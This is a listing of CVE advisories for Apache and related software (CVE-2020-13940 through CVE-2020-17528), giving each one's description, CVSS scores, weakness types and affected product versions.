CVE-2020-13940 MEDIUM

In Apache NiFi 1.0.0 to 1.11.4, the notification service manager and various policy authorizer and user group provider objects allowed trusted administrators to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-13941 MEDIUM

Reported in SOLR-14515 (private) and fixed in SOLR-14561 (public), released in Solr version 8.6.0. The Replication handler (https://lucene.apache.org/solr/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler) allows the commands backup, restore and deleteBackup. Each of these takes a location parameter, which was not validated, i.e. you could read/write to any location the solr user can access.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache solr *
CVE-2020-13942 HIGH

It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,

Products Affected

Vendor Product Version
apache unomi *
CVE-2020-13943 MEDIUM

If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 9.0.10
apache tomcat 9.0.33
apache tomcat 8.5.5
apache tomcat 10.0.0
apache tomcat 8.5.31
apache tomcat 8.5.48
oracle instantis_enterprisetrack 17.3
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 9.0.4
apache tomcat 8.5.42
apache tomcat 9.0.12
apache tomcat 8.5.18
apache tomcat 9.0.27
apache tomcat 9.0.13
apache tomcat 9.0.9
apache tomcat 9.0.14
apache tomcat 9.0.16
apache tomcat 8.5.52
apache tomcat 9.0.0
apache tomcat 8.5.41
apache tomcat 8.5.21
apache tomcat 8.5.4
apache tomcat 8.5.11
oracle instantis_enterprisetrack 17.1
apache tomcat 8.5.47
apache tomcat 8.5.25
apache tomcat 8.5.39
apache tomcat 9.0.29
apache tomcat 9.0.30
apache tomcat 8.5.38
apache tomcat 8.5.46
apache tomcat 8.5.22
apache tomcat 8.5.7
apache tomcat 8.5.19
apache tomcat 8.5.49
apache tomcat 8.5.34
apache tomcat 9.0.35
apache tomcat 8.5.28
apache tomcat 9.0.3
apache tomcat 9.0.6
apache tomcat 8.5.20
apache tomcat 8.5.16
apache tomcat 8.5.27
apache tomcat 8.5.33
apache tomcat 9.0.34
oracle instantis_enterprisetrack 17.2
apache tomcat 9.0.18
apache tomcat 9.0.11
apache tomcat 9.0.21
apache tomcat 8.5.1
apache tomcat 9.0.7
apache tomcat 9.0.8
apache tomcat 9.0.1
apache tomcat 8.5.15
apache tomcat 8.5.43
apache tomcat 8.5.23
apache tomcat 8.5.24
apache tomcat 8.5.26
apache tomcat 9.0.22
apache tomcat 8.5.35
apache tomcat 9.0.31
debian debian_linux 9.0
apache tomcat 8.5.6
apache tomcat 8.5.45
apache tomcat 8.5.37
apache tomcat 8.5.8
apache tomcat 9.0.36
apache tomcat 8.5.0
apache tomcat 9.0.26
apache tomcat 8.5.51
apache tomcat 8.5.17
apache tomcat 9.0.15
apache tomcat 8.5.55
apache tomcat 9.0.28
apache tomcat 9.0.32
apache tomcat 9.0.25
debian debian_linux 10.0
apache tomcat 8.5.57
apache tomcat 8.5.29
apache tomcat 8.5.36
apache tomcat 9.0.19
apache tomcat 9.0.5
apache tomcat 9.0.17
apache tomcat 8.5.53
apache tomcat 8.5.40
apache tomcat 8.5.10
apache tomcat 8.5.12
apache tomcat 8.5.32
apache tomcat 8.5.44
apache tomcat 8.5.30
oracle sd-wan_edge 9.0
apache tomcat 9.0.2
apache tomcat 9.0.24
apache tomcat 8.5.13
apache tomcat 8.5.54
apache tomcat 9.0.23
apache tomcat 8.5.50
apache tomcat 9.0.20
apache tomcat 8.5.56
apache tomcat 8.5.3
apache tomcat 9.0.37
CVE-2020-13944 MEDIUM

In Apache Airflow < 1.10.12, the "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to an XSS exploit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-13945 MEDIUM

In Apache APISIX, if the user enables the Admin API and deletes the Admin API access IP restriction rules, the default token is then allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4 and 1.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache apisix *
CVE-2020-13946 MEDIUM

In Apache Cassandra, all versions prior to 2.1.22, 2.2.18, 3.0.22, 3.11.8 and 4.0-beta2, it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorised operations. Users should also be aware of CVE-2019-2684, a JRE vulnerability that enables this issue to be exploited remotely.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
netapp oncommand_insight -
apache cassandra *
apache cassandra 4.0.0
CVE-2020-13947 MEDIUM

An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the message.jsp page of Apache ActiveMQ versions 5.15.12 through 5.16.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
apache activemq *
CVE-2020-13948 MEDIUM

While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python’s `os` package in the web application process in versions < 0.37.1. It was thus possible for an authenticated user to list and access files, environment variables, and process information. Additionally it was possible to set environment variables for the current process, create and update files in folders writable by the web process, and execute arbitrary programs accessible by the web process. All other operations available to the `os` package in Python were also available, even if not explicitly enumerated in this CVE.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2020-13949 MEDIUM

In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache hive *
apache thrift *
oracle communications_cloud_native_core_policy 1.14.0
CVE-2020-13950 MEDIUM

Apache HTTP Server versions 2.4.41 to 2.4.46 mod_proxy_http can be made to crash (NULL pointer dereference) with specially crafted requests using both Content-Length and Transfer-Encoding headers, leading to a Denial of Service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2020-13951 MEDIUM

Attackers can use the public NetTest web service of Apache OpenMeetings 4.0.0-5.0.0 to mount a denial of service attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2020-13952 MEDIUM

In the course of work on the open source project it was discovered that authenticated users running queries against Hive and Presto database engines could access information via a number of templated fields including the contents of query description metadata database, the hashed version of the authenticated users’ password, and access to connection information including the plaintext password for the current connection. It would also be possible to run arbitrary methods on the database connection object for the Presto or Hive connection, allowing the user to bypass security controls internal to Superset. This vulnerability is present in every Apache Superset version < 0.37.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2020-13953 MEDIUM

In Apache Tapestry from 5.4.0 to 5.5.0, by crafting specific URLs an attacker can download files inside the WEB-INF folder of the WAR being run.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2020-13954 MEDIUM

By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject JavaScript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
oracle retail_order_broker_cloud_service 15.0
oracle business_intelligence 12.2.1.4.0
netapp vasa_provider_for_clustered_data_ontap *
apache cxf *
oracle communications_messaging_server 8.1
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_messaging_server 8.0.2
CVE-2020-13955 MEDIUM

The HttpUtils#getURLConnection method explicitly disables hostname verification for HTTPS connections, making clients vulnerable to man-in-the-middle attacks. Calcite uses this method internally to connect with Druid and Splunk, so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class, so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache calcite *
CVE-2020-13956 MEDIUM

Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret a malformed authority component in request URIs passed to the library as a java.net.URI object and pick the wrong target host for request execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
oracle commerce_guided_search 11.3.2
oracle jd_edwards_enterpriseone_orchestrator *
oracle retail_customer_management_and_segmentation_foundation *
quarkus quarkus *
oracle data_integrator 12.2.1.4.0
oracle primavera_unifier 16.2
oracle peoplesoft_enterprise_peopletools 8.58
oracle primavera_unifier *
oracle nosql_database *
oracle spatial_studio *
oracle weblogic_server 12.2.1.4.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle primavera_unifier 20.12
apache httpclient *
oracle primavera_unifier 18.8
oracle peoplesoft_enterprise_pt_peopletools 8.57
netapp snapcenter -
oracle primavera_unifier 16.1
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle sql_developer *
oracle weblogic_server 14.1.1.0.0
oracle data_integrator 12.2.1.3.0
oracle peoplesoft_enterprise_pt_peopletools 8.59
CVE-2020-13957 HIGH

Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevent some features considered dangerous (which could be used for remote code execution) from being configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2020-13958 HIGH

A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target user's file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler and other hyperlinks require a control-click.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2020-13959 MEDIUM

The default error page for VelocityView in Apache Velocity Tools prior to 3.1 reflects back the vm file that was entered as part of the URL. An attacker can set an XSS payload file as this vm file in the URL which results in this payload being executed. XSS vulnerabilities allow attackers to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache velocity_tools *
CVE-2020-15250 LOW

In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix-like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. This vulnerability impacts you if the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder, and the JUnit tests execute in an environment where the OS has other untrusted users. Because certain JDK file system APIs were only added in JDK 1.7, this fix is dependent upon the version of the JDK you are using. For Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. For Java 1.6 and lower users: no patch is available, you must use the workaround below. If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. For more information, including an example of vulnerable code, see the referenced GitHub Security Advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6
security-advisories@github.com 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N 0.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,CWE-732,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache pluto *
oracle communications_cloud_native_core_policy 1.14.0
junit junit4 *
CVE-2020-17508 MEDIUM

The ATS ESI plugin has a memory disclosure vulnerability. If you are running the plugin please upgrade. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2020-17509 MEDIUM

ATS negative cache option is vulnerable to a cache poisoning attack. If you have this option enabled, please upgrade or disable this feature. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2020-17510 HIGH

In Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache shiro *
CVE-2020-17511 MEDIUM

In Airflow versions prior to 1.10.13, when creating a user using the airflow CLI, the password gets logged in plain text in the Log table in the Airflow metadata database. The same happened when creating a Connection with a password field.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-312,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17513 MEDIUM

In Apache Airflow versions prior to 1.10.13, the Charts and Query View of the old (Flask-admin based) UI were vulnerable to SSRF attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17514 MEDIUM

Apache Fineract prior to 1.5.0 disables HTTPS hostname verification in ProcessorHelper in the configureClient method. Under typical deployments, a man-in-the-middle attack could be successful.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache fineract *
CVE-2020-17515 MEDIUM

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to an XSS exploit. This issue affects Apache Airflow versions prior to 1.10.13. This is the same as CVE-2020-13944, but the fix implemented in Airflow 1.10.13 did not fix the issue completely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17516 MEDIUM

Apache Cassandra versions 2.1.0 to 2.1.22, 2.2.0 to 2.2.19, 3.0.0 to 3.0.23, and 3.11.0 to 3.11.9, when using the 'dc' or 'rack' internode_encryption setting, allow both encrypted and unencrypted internode connections. A misconfigured node or a malicious user can use the unencrypted connection despite not being in the same rack or dc, and bypass the mutual TLS requirement.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-290,CWE-290,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2020-17517 MEDIUM

The S3 buckets and keys in a secure Apache Ozone Cluster must be inaccessible to anonymous access by default. The current security vulnerability allows access to keys and buckets through a curl command or an unauthenticated HTTP request. This enables unauthorized access to buckets and keys thereby exposing data to anonymous clients or users. This affected Apache Ozone prior to the 1.1.0 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-285,CWE-306,

Products Affected

Vendor Product Version
apache ozone *
CVE-2020-17518 MEDIUM

Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP header. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-23,CWE-22,

Products Affected

Vendor Product Version
apache flink *
CVE-2020-17519 MEDIUM

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,CWE-552,

Products Affected

Vendor Product Version
apache flink *
CVE-2020-17520 MEDIUM

In Pulsar manager version 0.1.0, malicious users are able to bypass pulsar-manager's admin permission verification mechanism by constructing special URLs, thereby accessing any HTTP API.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache pulsar_manager 0.1.0
CVE-2020-17521 LOW

Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
apache groovy 4.0.0
oracle ilearning 6.2
oracle communications_services_gatekeeper 6.1
oracle communications_brm_-_elastic_charging_engine 12.0.0.3
oracle agile_engineering_data_management 6.2.1.0
oracle communications_services_gatekeeper 6.0
oracle retail_bulk_data_integration 15.0.3.0
oracle retail_bulk_data_integration 16.0.3.0
oracle primavera_gateway *
oracle primavera_unifier 16.2
oracle retail_merchandising_system 16.0.3
oracle jd_edwards_enterpriseone_orchestrator 9.2.6.0
oracle agile_plm 9.3.3
apache groovy *
oracle retail_store_inventory_management 16.0.3.5
oracle agile_plm 9.3.6
oracle primavera_unifier *
oracle hospitality_opera_5 5.6
oracle retail_store_inventory_management 14.1.3.10
oracle communications_brm_-_elastic_charging_engine 11.3.0.9.0
oracle primavera_unifier 20.12
oracle insurance_policy_administration *
oracle communications_services_gatekeeper 7.0
oracle communications_diameter_signaling_router 8.4.0.0
oracle agile_plm_mcad_connector 3.6
oracle primavera_unifier 18.8
netapp snapcenter -
oracle primavera_unifier 16.1
apache atlas 2.1.0
oracle business_process_management_suite 12.2.1.4.0
oracle communications_evolved_communications_application_server 7.1
oracle primavera_unifier 19.12
oracle healthcare_data_repository 7.0.2
oracle ilearning 6.3
oracle retail_store_inventory_management 15.0.3.5
oracle agile_plm_mcad_connector 3.4
CVE-2020-17522 MEDIUM

When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN architecture.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2020-17523 HIGH

In Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache shiro *
CVE-2020-17525 MEDIUM

Subversion's mod_authz_svn module will crash if the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option and a client sends a request for a non-existing repository URL. This can lead to disruption for users of the service. This issue was fixed in mod_dav_svn+mod_authz_svn servers 1.14.1 and mod_dav_svn+mod_authz_svn servers 1.10.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache subversion *
CVE-2020-17526 LOW

Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17527 MEDIUM

While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
debian debian_linux 10.0
apache tomcat 9.0.35-3.57.3
apache tomcat 9.0.38
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle mysql_enterprise_monitor *
apache tomcat 9.0.39
oracle blockchain_platform *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle communications_cloud_native_core_binding_support_function 1.10.0
oracle communications_cloud_native_core_policy 1.14.0
debian debian_linux 9.0
oracle workload_manager 19c
oracle sd-wan_edge 9.0
apache tomcat 9.0.35-3.39.1
apache tomcat 9.0.36
apache tomcat 9.0.0
netapp element_plug-in -
oracle instantis_enterprisetrack 17.2
apache tomcat 9.0.37
CVE-2020-17528 MEDIUM

